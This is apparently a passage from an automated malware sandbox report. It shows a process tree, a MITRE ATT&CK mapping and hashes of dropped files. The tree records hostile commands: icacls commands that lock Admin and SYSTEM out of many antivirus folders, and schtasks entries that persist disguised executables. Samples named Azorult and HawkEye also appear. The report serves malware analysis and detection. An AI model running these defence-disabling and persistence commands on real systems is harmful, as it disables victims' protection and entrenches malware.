- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9080
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:7288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8740
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:6696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:8456
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9364
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:9372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:10828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9396
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:9412
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:7748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:9528
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:9536
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:7224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:9592
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:5852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:9696
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      PID:5380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:9988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10140
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:10148
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      PID:8184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9940
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:8676
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:6632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8188
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10548
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10844
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:10936
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:10528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11248
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6388
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:7880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6292
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1788
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7336
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7440
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7944
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9144
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9444
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6976
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9664
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6720
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3596
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5860
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8492
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:8912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8184
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:9136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:8808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:7508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:11216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2440
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:10376
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      PID:9876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9604
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:10408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:7424
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:9084
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8020
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8448
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:872
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:744
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:11160
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:10236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:10860
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:11048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8124
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2532
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:9032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:8672
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:9492
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      PID:7784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7452
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:8616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:7364
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5148
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:7988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:7540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7192
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      PID:7340
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2948
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:8260
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5372
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:6612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9088 /prefetch:8
  2⤵
  PID:9528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4652 /prefetch:8
  2⤵
  PID:9416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10648 /prefetch:1
  2⤵
  PID:7884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9132 /prefetch:8
  2⤵
  PID:10660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1980,5785423143389081724,16245048813198962579,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8472 /prefetch:8
  2⤵
  PID:10324
- C:\Users\Admin\Downloads\Lentin.c.exe
  "C:\Users\Admin\Downloads\Lentin.c.exe"
  2⤵
  PID:9064

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3368

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4548
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:1820
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:1788
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:9992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:11184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:9928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2464

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:7664

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7500

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:10544

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\jdk-1.8\jre\lib\YOUR_FILES_ARE_ENCRYPTED.HTML

Filesize
4KB

MD5
827b9ea4d7383762c7f9ab59868dd988

SHA1
be538d0bca072d790c1089f343fa1da8a2afb1dd

SHA256
d4def617571b1b7e43fcaee323aeaa0b95f0d6809ea602c2d1d7d2303252c74d

SHA512
5ce9d0723307c578e9353f34aa281175cffb810b3edb2a34a9434c2f9d533b50de53b29542faec484593637a25f82fdb77f4ac4a190cae6552b79d3f591999f6

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Filesize
2.0MB

MD5
639a6e9e1949265f493c1a3505bc3430

SHA1
416384c79557c0a2d1e56e9449ac04d71c9f3477

SHA256
a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd

SHA512
57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
